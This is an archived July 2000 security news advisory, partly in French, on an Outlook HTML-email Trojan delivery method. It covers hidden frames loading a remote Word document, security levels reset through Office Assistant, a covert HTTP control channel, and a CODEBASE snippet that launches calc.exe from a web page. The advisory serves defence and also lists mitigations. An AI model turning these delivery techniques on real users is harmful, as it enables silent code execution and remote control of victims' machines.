Telecom and Logistics Associates 

new6.gif (1031 bytes) TLAalert    Security Service 
Translate this page from:  publication: Christian ALT 
  Save Time and Money

TLAnews: Security NEWs Service

 10.7.2000 SecurityOutlook Scenario for a new trojan
As Microsoft software becomes more complex, an increase in security vulnerabilities seems to be inevitable, and Outlook is one of the applications that has suffered more than most. And as Internet-borne virus attacks become more numerous, it is getting harder for the IT manager to protect the system.

En français: Scenario pour un nouveau trojan avec Outlook
Comme les logiciels de Microsoft deviennent plus complexe, une augmentation des vulnérabilités semble inévitable, et Outlook est une des applications qui en a souffert le plus. Comme les attaques deviennent plus nombreuses, il devient plus difficile pour les responsables informatique de protèger leurs systèmes.

Home
Consulting
Tech Doc
FW-1 FAQ
Training
Products
TLAnews
Archive
Advertising
 

TLAnews.com
Information for security concerned people

 
Register to TLAnews letter
English version
Email messages encoded in the Web's HTML format can be used to inject malicious code onto a user's system simply through previewing or opening the main message.

Hostile email can work as follows. An HTML email is sent to the recipient. When opened or previewed it calls up a number of framesets, one of which is an innocent message. A second frameset loads a Word document from a remote server, and this is run in a zero-sized window so that it is not readily apparent. The Word document contains VBScript to run the virus writer's hostile Trojan code. If the Word installation has had the security levels set, then [virus writers use] the Office Assistant to reset them. 
Résumé en français
Outlook a montré beaucoup de faiblesse face aux attaques des trojans. Voici un scénario qui ne nécessite même pas l'ouverture du message. Il se base sur l'utilisation de HTML dans le message et plus particulièrement sur celle des "Framesets". Cela consiste à ouvrir un message composé de plusieurs "Frames". L'une d'entre-elles de taille nulle, contient un document Word chargé depuis un site distant. Ce document contient du code avec le virus.

Le trojan peut être executé. Il peut ensuite ouvrir un canal de contrôle en utilisant le protocole HTTP généralement admis par les firewalls et ensuite transmettre de l'informations sur l'extérieur.

If the Office Assistant is not installed, then [they] use Active Setup to do so. The result is that the Trojan is run -­ unless the relevant fixes for Outlook have been installed. It is important, therefore, not simply to rely on users having the sense not to open suspicious attachments ­- without the Microsoft fixes, email can hit and run.

The Trojan can open a so-called covert control channel via the HTTP port ­- usually admitted through firewalls -­ to execute code and return results. The implication is that a victim PC might be wholly controlled by the remote attacker.

This technique is a variation on a theme that uses innocuous looking Web pages to install and run a malicious program on the surfer's PC. There are many ways to get a Trojan onto a target PC -­ but Barrett's technique uses HTML frames.

The frames are used to point to malicious files containing JavaScript and ActiveX, not just other HTML files. By combining this with an HTTP meta-tag known as refresh, the system can be tricked into storing files in the Windows Temp folder and subsequently running them, regardless of a user's response to the browser's warnings.

As an advisory notice first published on the Malware site puts it: "Microsoft Internet Explorer 5 and accompanying mail and news clients on Win95, Win98 and Win2000 enjoy a unique status in that they choose to ignore user input. [Hackers are] able to manually force a file onto the target computer despite all prompts and warnings."

The technique  described is a new method of getting the malicious code onto the target's PC simply through mail, rather than relying on the user to browse the correct malicious URL ­ in other words, it can be used to target the victim.

The latest security patches for Outlook cure the problem in preview mode but not if messages are opened, so system managers should also consider making Windows Temp folders non-executable. This would solve the security issues, but could cause problems with some application installers and setup routines.

Remotely triggered Trojans:

Virus writers do not need their Trojan to be run as soon as it is stored. If they know where it is and what it is called, they can use other HTML code to run it later. One contributor to hackers' Web site L0pht provided the following snippet to demonstrate this.

First place a copy of Calc.exe in your Windows\System32 folder. Then create a valid HTML page containing no more than the following code in the body of the page:

CODEBASE='c:\windows\system32\calc.exe'>

Open this file in Internet Explorer ­ and watch Calc being run. It takes little imagination to see how easy it is to get a hidden Trojan to run silently.

 
Author information.
Copyright © [Telecom and Logistics Associates Sàrl]. All rights reserved.
Revised: juillet 10, 2000 .

All information provided is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the facts of the particular situation.